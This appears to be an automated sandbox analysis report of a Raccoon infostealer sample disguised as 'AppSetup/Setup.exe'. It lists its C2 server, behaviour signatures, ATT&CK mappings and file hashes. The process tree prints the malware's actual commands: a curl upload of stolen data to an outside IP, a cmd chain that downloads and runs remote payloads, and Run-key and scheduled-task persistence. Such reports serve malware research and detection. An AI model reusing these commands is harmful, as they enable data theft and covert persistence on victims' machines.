Overview

overview

10

Static

static

7

AppSetup/Setup.exe

windows7-x64

10

AppSetup/Setup.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    153s
  • max time network
    164s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-09-2022 17:31

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    AppSetup/Setup.exe

  • Size

    700.0MB

  • MD5

    b494ad739d58aba5ce48c05a29215496

  • SHA1

    4e18330d3779e3c13b043d2090e6a0ce1571668a

  • SHA256

    6c7e2a5a6b4fcad8591cf0ba6854333d44d2be2724d0922f374791eb15e94d89

  • SHA512

    2747aa2ab4a8ea2ada344d2e4a9bbf4f1d15893b4fbfd4a84dbf08d7a6d90517445bf5dc0569299e4b9a2edd17537382e5a9db6df7bb3c1b39eb1858ef17ec8b

  • SSDEEP

    98304:Rv578/6bPZsGjNT46RutNpYdFU8xgFLqmMLfN:Rv578/iaGjNT493WgDo

Score
10/10
raccoon53b091e45e3b45faf54ed22a972aa360agilenetpersistencespywarestealer

Malware Config

Extracted

Family

raccoon

Botnet

53b091e45e3b45faf54ed22a972aa360

C2

http://168.100.9.109/

rc4.plain

Signatures

  • Raccoon

    Raccoon is an infostealer written in C++ and first seen in 2019.

    stealerraccoon
  • Downloads MZ/PE file
  • Executes dropped EXE 5 IoCs
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 3 IoCs
  • Obfuscated with Agile.Net obfuscator 1 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

    agilenet
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 5 IoCs
    persistence
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 59 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\AppSetup\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\AppSetup\Setup.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3052
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -Seconds 30
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4776
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3692
    • C:\Users\Admin\AppData\Local\Temp\AppSetup\Setup.exe
      C:\Users\Admin\AppData\Local\Temp\AppSetup\Setup.exe
      2⤵
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:5080
      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Decoder.exe
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Decoder.exe
        3⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:3116
        • C:\Users\Admin\AppData\Local\Temp\314209c118\wfyoot.exe
          "C:\Users\Admin\AppData\Local\Temp\314209c118\wfyoot.exe"
          4⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4916
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN wfyoot.exe /TR "C:\Users\Admin\AppData\Local\Temp\314209c118\wfyoot.exe" /F
            5⤵
            • Creates scheduled task(s)
            PID:800
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1000468021\1nstall.cmd" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3152
            • C:\Windows\SysWOW64\reg.exe
              reg query HKEY_CURRENT_USER\SOFTWARE\miHoYo /s
              6⤵
                PID:4292
              • C:\Windows\SysWOW64\ipconfig.exe
                ipconfig /all
                6⤵
                • Gathers network information
                PID:3100
              • C:\Windows\SysWOW64\curl.exe
                curl http://193.106.191.184:8002/mihoyo --upload-file C:\Users\Admin\AppData\Local\Temp\update.log
                6⤵
                  PID:2580
              • C:\Users\Admin\AppData\Local\Temp\1000480001\svhost.exe
                "C:\Users\Admin\AppData\Local\Temp\1000480001\svhost.exe"
                5⤵
                • Executes dropped EXE
                • Checks computer location settings
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:628
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAyAA==
                  6⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3932
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                  6⤵
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:2360
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c (mkdir "%APPDATA%\Java\jre1.8.0_141\bin\client") & (mkdir "%APPDATA%\Java\jre1.8.0_141\lib\i386") & (if not exist "%APPDATA%\Java\jre1.8.0_141\bin\javaw.exe" curl -L -o "%APPDATA%\Java\jre1.8.0_141\bin\javaw.exe" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/javaw.exe) & (if not exist "%APPDATA%\Java\jre1.8.0_141\bin\java.dll" curl -L -o "%APPDATA%\Java\jre1.8.0_141\bin\java.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/java.dll) & (if not exist "%APPDATA%\Java\jre1.8.0_141\bin\verify.dll" curl -L -o "%APPDATA%\Java\jre1.8.0_141\bin\verify.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/verify.dll) & (if not exist "%APPDATA%\Java\jre1.8.0_141\bin\zip.dll" curl -L -o "%APPDATA%\Java\jre1.8.0_141\bin\zip.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/zip.dll) & (if not exist "%APPDATA%\Java\jre1.8.0_141\bin\net.dll" curl -L -o "%APPDATA%\Java\jre1.8.0_141\bin\net.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/net.dll) & (if not exist "%APPDATA%\Java\jre1.8.0_141\bin\nio.dll" curl -L -o "%APPDATA%\Java\jre1.8.0_141\bin\nio.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/nio.dll) & (if not exist "%APPDATA%\Java\jre1.8.0_141\bin\msvcp120.dll" curl -L -o "%APPDATA%\Java\jre1.8.0_141\bin\msvcp120.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/msvcp120.dll) & (if not exist "%APPDATA%\Java\jre1.8.0_141\bin\msvcr120.dll" curl -L -o "%APPDATA%\Java\jre1.8.0_141\bin\msvcr120.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/msvcr120.dll) & (if not exist "%APPDATA%\Java\jre1.8.0_141\bin\client\jvm.dll" curl -L -o "%APPDATA%\Java\jre1.8.0_141\bin\client\jvm.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/jvm.dll) & (if not exist "%APPDATA%\Java\jre1.8.0_141\lib\rt.jar" curl -L -o "%APPDATA%\Java\jre1.8.0_141\lib\rt.jar" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/rt.jar) & (if not exist "%APPDATA%\Java\jre1.8.0_141\lib\i386\jvm.cfg" curl -L -o "%APPDATA%\Java\jre1.8.0_141\lib\i386\jvm.cfg" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/jvm.cfg) & (cd /d "%APPDATA%\Java\jre1.8.0_141") & (curl -L -o "%APPDATA%\Java\jre1.8.0_141\Runtime.class" -k http://193.106.191.11/RuntimeMain.class) & (reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v "Java Update 8u141" /t REG_SZ /d "cmd /c \"cd \"%APPDATA%\Java\jre1.8.0_141\" ^&^& start /b bin\javaw.exe -Dsun.stderr.encoding=ASCII -Dsun.stdout.encoding=ASCII -Dsun.jnu.encoding=UTF-8 Runtime ^&^& exit\"") & (bin\javaw -Dsun.stderr.encoding=ASCII -Dsun.stdout.encoding=ASCII -Dsun.jnu.encoding=UTF-8 Runtime)
                    7⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4328
                    • C:\Windows\SysWOW64\curl.exe
                      curl -L -o "C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\javaw.exe" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/javaw.exe
                      8⤵
                        PID:888
                      • C:\Windows\SysWOW64\curl.exe
                        curl -L -o "C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\java.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/java.dll
                        8⤵
                          PID:1844
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                      6⤵
                        PID:3492
            • C:\Users\Admin\AppData\Local\Temp\314209c118\wfyoot.exe
              C:\Users\Admin\AppData\Local\Temp\314209c118\wfyoot.exe
              1⤵
              • Executes dropped EXE
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              PID:1900
            • C:\Users\Admin\AppData\Local\Temp\314209c118\wfyoot.exe
              C:\Users\Admin\AppData\Local\Temp\314209c118\wfyoot.exe
              1⤵
              • Executes dropped EXE
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:4052

            Network

            MITRE ATT&CK Matrix ATT&CK v6

            Initial Access

            Execution

            Scheduled Task

            1
            T1053

            Command-Line Interface

            1
            T1059

            Persistence

            Registry Run Keys / Startup Folder

            1
            T1060

            Scheduled Task

            1
            T1053

            Privilege Escalation

            Scheduled Task

            1
            T1053

            Defense Evasion

            Modify Registry

            1
            T1112

            Credential Access

            Credentials in Files

            1
            T1081

            Discovery

            Query Registry

            1
            T1012

            System Information Discovery

            3
            T1082

            Lateral Movement

            Collection

            Data from Local System

            1
            T1005

            Exfiltration

            Command and Control

            Impact

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\LocalLow\mozglue.dll
              Filesize

              612KB

              MD5

              f07d9977430e762b563eaadc2b94bbfa

              SHA1

              da0a05b2b8d269fb73558dfcf0ed5c167f6d3877

              SHA256

              4191faf7e5eb105a0f4c5c6ed3e9e9c71014e8aa39bbee313bc92d1411e9e862

              SHA512

              6afd512e4099643bba3fc7700dd72744156b78b7bda10263ba1f8571d1e282133a433215a9222a7799f9824f244a2bc80c2816a62de1497017a4b26d562b7eaf

              Download Submit
            • C:\Users\Admin\AppData\LocalLow\nss3.dll
              Filesize

              1.9MB

              MD5

              f67d08e8c02574cbc2f1122c53bfb976

              SHA1

              6522992957e7e4d074947cad63189f308a80fcf2

              SHA256

              c65b7afb05ee2b2687e6280594019068c3d3829182dfe8604ce4adf2116cc46e

              SHA512

              2e9d0a211d2b085514f181852fae6e7ca6aed4d29f396348bedb59c556e39621810a9a74671566a49e126ec73a60d0f781fa9085eb407df1eefd942c18853be5

              Download Submit
            • C:\Users\Admin\AppData\LocalLow\sqlite3.dll
              Filesize

              1.0MB

              MD5

              dbf4f8dcefb8056dc6bae4b67ff810ce

              SHA1

              bbac1dd8a07c6069415c04b62747d794736d0689

              SHA256

              47b64311719000fa8c432165a0fdcdfed735d5b54977b052de915b1cbbbf9d68

              SHA512

              b572ca2f2e4a5cc93e4fcc7a18c0ae6df888aa4c55bc7da591e316927a4b5cfcbdda6e60018950be891ff3b26f470cc5cce34d217c2d35074322ab84c32a25d1

              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Filesize

              1KB

              MD5

              b7ac3aff10f74dbcad5a239707fa3ef6

              SHA1

              35ff67b09a376a48516f62987ebf6b5b2d7d36a7

              SHA256

              f79868a9d81c7b9cf76ccf8c0b45cad13af35f9313a511eab6e451723d86fb8d

              SHA512

              9dcb3f8fca18c8af42e1cec7d2a4cdb9dc8d5dbb3c30d7033a850bffebe775b5495e51cb5d375cc300fe9bb118325b726d619c9c847dae07cc9b5538f3339f54

              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\1000468021\1nstall.cmd
              Filesize

              203B

              MD5

              e539a159ce5a1c597f537a920ae72652

              SHA1

              7d808565ebfe7a5f03b84bd40c8dd9477d7390f4

              SHA256

              760a1b9e7652cf8215161083e23f4f89f6c25d25c462b57591b13cc703338e3e

              SHA512

              d75b97ea4bb3dda43f20f7117abaa538d92ebef906605cd6e176592192a2e07dbc33dbfed271dfc6093bf66b03723c92f6b942a718b0ee35188ab9df73e778b1

              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\1000480001\svhost.exe
              Filesize

              221KB

              MD5

              84cdd038136ea850a8df2f72dceb46f6

              SHA1

              eea33cdc4cbf8f46ef405d69077d6b16763768b4

              SHA256

              c93ae488d039def12b64ad966edf70369ddbcd5ea0d83f98247d15750ad39511

              SHA512

              26b0872625601cb884f81266fbe042beb3c2887df00f0dc468d76719739a823402f52ef6593129ebcff05bb11cee80e89a498730aef9177df199a28a58dc64aa

              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\1000480001\svhost.exe
              Filesize

              221KB

              MD5

              84cdd038136ea850a8df2f72dceb46f6

              SHA1

              eea33cdc4cbf8f46ef405d69077d6b16763768b4

              SHA256

              c93ae488d039def12b64ad966edf70369ddbcd5ea0d83f98247d15750ad39511

              SHA512

              26b0872625601cb884f81266fbe042beb3c2887df00f0dc468d76719739a823402f52ef6593129ebcff05bb11cee80e89a498730aef9177df199a28a58dc64aa

              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\314209c118\wfyoot.exe
              Filesize

              324.0MB

              MD5

              f503e21dedc93777f9c25f0fd07cdb0e

              SHA1

              ceab1c1bac082fed35d9243c83dae15be761790b

              SHA256

              2952529437b58f42169b9ba72088f02e021d2eefa86ffe59ab46b1837676382e

              SHA512

              a6395acda765d481fb2a8ee8f629b24a1666d3726d37cb2133451cee7bf6a6dd941d44789729d8457467a435061d9752323d6cdb8c927f93462c8bf9054bae99

              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\314209c118\wfyoot.exe
              Filesize

              327.3MB

              MD5

              f22991ff240bfac923df50516ba5ebb5

              SHA1

              e6e34f70380889330eceb722008d6dc67748cf3b

              SHA256

              ef54c865cffa45638230e1d0fd4c4442b3bc705ffda8903e779f370d50c9396f

              SHA512

              20a088686c579a38629ca05b5863153a18bdbfbef06e5f2e507545186ae00ddb6db7575d7e1303006efe27552cd06e4412482c7b559f8907a554748d2496f01b

              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\314209c118\wfyoot.exe
              Filesize

              186.3MB

              MD5

              72eee0cc14f84a7f9db2f29bf843d079

              SHA1

              a7546f998d4a2cf212a97998fef59623cbce2b1b

              SHA256

              fe089b764a74bdcefed0b7b3b954b7d5912a56ff6e0bc250c2a75a33f16119d1

              SHA512

              afe527fc31acc5275838e2b6ba8f5e93a9fe91164cd442047e0a2c0126d155ff345c824609ddc95372d11c8edf2d960dafe3331e183f17bace89c0756d33a52c

              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\314209c118\wfyoot.exe
              Filesize

              2.8MB

              MD5

              965930b793bd8fe6c0c18de7bf2a5173

              SHA1

              66022f74e6432480b06582c593b50ba926fe7823

              SHA256

              0ec1f9f0a65c79b638f2cbbfbf3044e1ea67a546aa43dd3f04227c48ed894728

              SHA512

              892aec4ed9694c488ac69e093b720067201f2e4e8b04455ef05ea43d8a59ae4e2167800211f5331f58fd2f7fb71da3f547cf879c1dc105081cb533f61f521f8c

              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Decoder.exe
              Filesize

              348.4MB

              MD5

              cbd2170ca7034ea3957b68b995b4b7f6

              SHA1

              9b00a056e098cbf709ffae27ab57d6a22b344cb4

              SHA256

              19dd1ef7317e28bb11e186af95c482bdd53f983d578d25f9659046e98a1775d5

              SHA512

              c61e2cca61fe9261fbeb09eabe8fe71cdf97707fce00ecfe8f8474568ecb9a239d88345f3e56649820d5f77bdf2507696f5056cceb9938934556919b8635fd3c

              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Decoder.exe
              Filesize

              254.2MB

              MD5

              d7e2187bddaf090837386111bac23f94

              SHA1

              5098a40faec968fbd25a93e6e7e0ef2d521d568d

              SHA256

              722bc13f74cd0e19417d02ed19cf8204bf7dfd2a8945e9253b5dda57a15eb36a

              SHA512

              ee09926932c52169cd82a5510d76a319366d84e03d02a1d39d96457255eb406e94080efbe0fe946cc51b390b46fe30e8deafe9ae5a1216c8f65f1bc41e98be2c

              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\update.log
              Filesize

              1023B

              MD5

              951a8c315f2a6b242ce516d8cae73ec2

              SHA1

              c1f33e44272a403b9eaab82f1e31134d005de222

              SHA256

              d6e24b88c8c9fc8525ac11df6c823fdc5f18f8233e503acaa758538365a14fca

              SHA512

              a43df982de65f86c0af4cbb17647983daf5dc98f3fcaaae1824d94df014e0888e0106b78b999fd7994e32f3664bfa04ddb18aedcd33fae11c3a63eba561c3c5c

              Download Submit
            • memory/628-188-0x00000000094A0000-0x00000000094C2000-memory.dmp
              Filesize

              136KB

              Download
            • memory/628-182-0x0000000000000000-mapping.dmp
              Download
            • memory/628-185-0x0000000000EE0000-0x0000000000F1E000-memory.dmp
              Filesize

              248KB

              Download
            • memory/800-173-0x0000000000000000-mapping.dmp
              Download
            • memory/888-218-0x0000000000000000-mapping.dmp
              Download
            • memory/1844-227-0x0000000000000000-mapping.dmp
              Download
            • memory/1900-201-0x0000000000800000-0x00000000008D6000-memory.dmp
              Filesize

              856KB

              Download
            • memory/1900-204-0x0000000000800000-0x00000000008D6000-memory.dmp
              Filesize

              856KB

              Download
            • memory/1900-200-0x0000000000800000-0x00000000008D6000-memory.dmp
              Filesize

              856KB

              Download
            • memory/1900-205-0x0000000002560000-0x00000000025A6000-memory.dmp
              Filesize

              280KB

              Download
            • memory/1900-203-0x0000000076390000-0x00000000765A5000-memory.dmp
              Filesize

              2.1MB

              Download
            • memory/1900-202-0x0000000000800000-0x00000000008D6000-memory.dmp
              Filesize

              856KB

              Download
            • memory/1900-199-0x0000000000800000-0x00000000008D6000-memory.dmp
              Filesize

              856KB

              Download
            • memory/2360-210-0x0000000000400000-0x0000000000414000-memory.dmp
              Filesize

              80KB

              Download
            • memory/2360-211-0x0000000000400000-0x0000000000414000-memory.dmp
              Filesize

              80KB

              Download
            • memory/2360-215-0x0000000000400000-0x0000000000414000-memory.dmp
              Filesize

              80KB

              Download
            • memory/2360-207-0x0000000000000000-mapping.dmp
              Download
            • memory/2360-217-0x0000000000400000-0x0000000000414000-memory.dmp
              Filesize

              80KB

              Download
            • memory/2360-208-0x0000000000400000-0x0000000000414000-memory.dmp
              Filesize

              80KB

              Download
            • memory/2580-180-0x0000000000000000-mapping.dmp
              Download
            • memory/3052-137-0x00007FFFDEF20000-0x00007FFFDF9E1000-memory.dmp
              Filesize

              10.8MB

              Download
            • memory/3052-148-0x00007FFFDEF20000-0x00007FFFDF9E1000-memory.dmp
              Filesize

              10.8MB

              Download
            • memory/3052-132-0x0000022076D60000-0x00000220770AE000-memory.dmp
              Filesize

              3.3MB

              Download
            • memory/3052-133-0x00007FFFDEF20000-0x00007FFFDF9E1000-memory.dmp
              Filesize

              10.8MB

              Download
            • memory/3100-179-0x0000000000000000-mapping.dmp
              Download
            • memory/3116-155-0x0000000000370000-0x0000000000446000-memory.dmp
              Filesize

              856KB

              Download
            • memory/3116-154-0x0000000000370000-0x0000000000446000-memory.dmp
              Filesize

              856KB

              Download
            • memory/3116-156-0x0000000000370000-0x0000000000446000-memory.dmp
              Filesize

              856KB

              Download
            • memory/3116-161-0x0000000000370000-0x0000000000446000-memory.dmp
              Filesize

              856KB

              Download
            • memory/3116-150-0x0000000000000000-mapping.dmp
              Download
            • memory/3116-159-0x0000000002950000-0x0000000002996000-memory.dmp
              Filesize

              280KB

              Download
            • memory/3116-153-0x0000000000370000-0x0000000000446000-memory.dmp
              Filesize

              856KB

              Download
            • memory/3116-160-0x0000000000370000-0x0000000000446000-memory.dmp
              Filesize

              856KB

              Download
            • memory/3116-157-0x0000000076390000-0x00000000765A5000-memory.dmp
              Filesize

              2.1MB

              Download
            • memory/3116-168-0x0000000002950000-0x0000000002996000-memory.dmp
              Filesize

              280KB

              Download
            • memory/3116-165-0x0000000000370000-0x0000000000446000-memory.dmp
              Filesize

              856KB

              Download
            • memory/3116-158-0x0000000000370000-0x0000000000446000-memory.dmp
              Filesize

              856KB

              Download
            • memory/3152-176-0x0000000000000000-mapping.dmp
              Download
            • memory/3492-206-0x0000000000000000-mapping.dmp
              Download
            • memory/3692-142-0x00007FFFDEF20000-0x00007FFFDF9E1000-memory.dmp
              Filesize

              10.8MB

              Download
            • memory/3692-141-0x00007FFFDEF20000-0x00007FFFDF9E1000-memory.dmp
              Filesize

              10.8MB

              Download
            • memory/3692-143-0x00007FFFDEF20000-0x00007FFFDF9E1000-memory.dmp
              Filesize

              10.8MB

              Download
            • memory/3692-140-0x0000000000000000-mapping.dmp
              Download
            • memory/3932-189-0x0000000000000000-mapping.dmp
              Download
            • memory/3932-190-0x0000000003130000-0x0000000003166000-memory.dmp
              Filesize

              216KB

              Download
            • memory/3932-191-0x00000000059C0000-0x0000000005FE8000-memory.dmp
              Filesize

              6.2MB

              Download
            • memory/3932-192-0x00000000058E0000-0x0000000005946000-memory.dmp
              Filesize

              408KB

              Download
            • memory/3932-193-0x0000000005FF0000-0x0000000006056000-memory.dmp
              Filesize

              408KB

              Download
            • memory/3932-198-0x0000000006BE0000-0x0000000006BFA000-memory.dmp
              Filesize

              104KB

              Download
            • memory/3932-195-0x00000000066F0000-0x000000000670E000-memory.dmp
              Filesize

              120KB

              Download
            • memory/3932-197-0x0000000007F60000-0x00000000085DA000-memory.dmp
              Filesize

              6.5MB

              Download
            • memory/4052-226-0x0000000000A20000-0x0000000000A66000-memory.dmp
              Filesize

              280KB

              Download
            • memory/4052-225-0x0000000000800000-0x00000000008D6000-memory.dmp
              Filesize

              856KB

              Download
            • memory/4052-223-0x0000000000800000-0x00000000008D6000-memory.dmp
              Filesize

              856KB

              Download
            • memory/4052-222-0x0000000000800000-0x00000000008D6000-memory.dmp
              Filesize

              856KB

              Download
            • memory/4052-220-0x0000000000800000-0x00000000008D6000-memory.dmp
              Filesize

              856KB

              Download
            • memory/4052-221-0x0000000000800000-0x00000000008D6000-memory.dmp
              Filesize

              856KB

              Download
            • memory/4052-224-0x0000000076390000-0x00000000765A5000-memory.dmp
              Filesize

              2.1MB

              Download
            • memory/4292-178-0x0000000000000000-mapping.dmp
              Download
            • memory/4328-216-0x0000000000000000-mapping.dmp
              Download
            • memory/4776-138-0x00007FFFDEF20000-0x00007FFFDF9E1000-memory.dmp
              Filesize

              10.8MB

              Download
            • memory/4776-136-0x00007FFFDEF20000-0x00007FFFDF9E1000-memory.dmp
              Filesize

              10.8MB

              Download
            • memory/4776-139-0x00007FFFDEF20000-0x00007FFFDF9E1000-memory.dmp
              Filesize

              10.8MB

              Download
            • memory/4776-135-0x000001A2DF8E0000-0x000001A2DF902000-memory.dmp
              Filesize

              136KB

              Download
            • memory/4776-134-0x0000000000000000-mapping.dmp
              Download
            • memory/4916-167-0x0000000000800000-0x00000000008D6000-memory.dmp
              Filesize

              856KB

              Download
            • memory/4916-171-0x0000000076390000-0x00000000765A5000-memory.dmp
              Filesize

              2.1MB

              Download
            • memory/4916-174-0x0000000000800000-0x00000000008D6000-memory.dmp
              Filesize

              856KB

              Download
            • memory/4916-187-0x0000000002D90000-0x0000000002DD6000-memory.dmp
              Filesize

              280KB

              Download
            • memory/4916-169-0x0000000000800000-0x00000000008D6000-memory.dmp
              Filesize

              856KB

              Download
            • memory/4916-162-0x0000000000000000-mapping.dmp
              Download
            • memory/4916-166-0x0000000000800000-0x00000000008D6000-memory.dmp
              Filesize

              856KB

              Download
            • memory/4916-175-0x0000000002D90000-0x0000000002DD6000-memory.dmp
              Filesize

              280KB

              Download
            • memory/4916-170-0x0000000000800000-0x00000000008D6000-memory.dmp
              Filesize

              856KB

              Download
            • memory/4916-186-0x0000000000800000-0x00000000008D6000-memory.dmp
              Filesize

              856KB

              Download
            • memory/5080-145-0x00000001400080C0-mapping.dmp
              Download
            • memory/5080-147-0x0000000140000000-0x00000001401ED000-memory.dmp
              Filesize

              1.9MB

              Download
            • memory/5080-172-0x0000000140000000-0x00000001401ED000-memory.dmp
              Filesize

              1.9MB

              Download
            • memory/5080-149-0x0000000140000000-0x00000001401ED000-memory.dmp
              Filesize

              1.9MB

              Download
            • memory/5080-146-0x0000000140000000-0x00000001401ED000-memory.dmp
              Filesize

              1.9MB

              Download
            • memory/5080-144-0x0000000140000000-0x00000001401ED000-memory.dmp
              Filesize

              1.9MB

              Download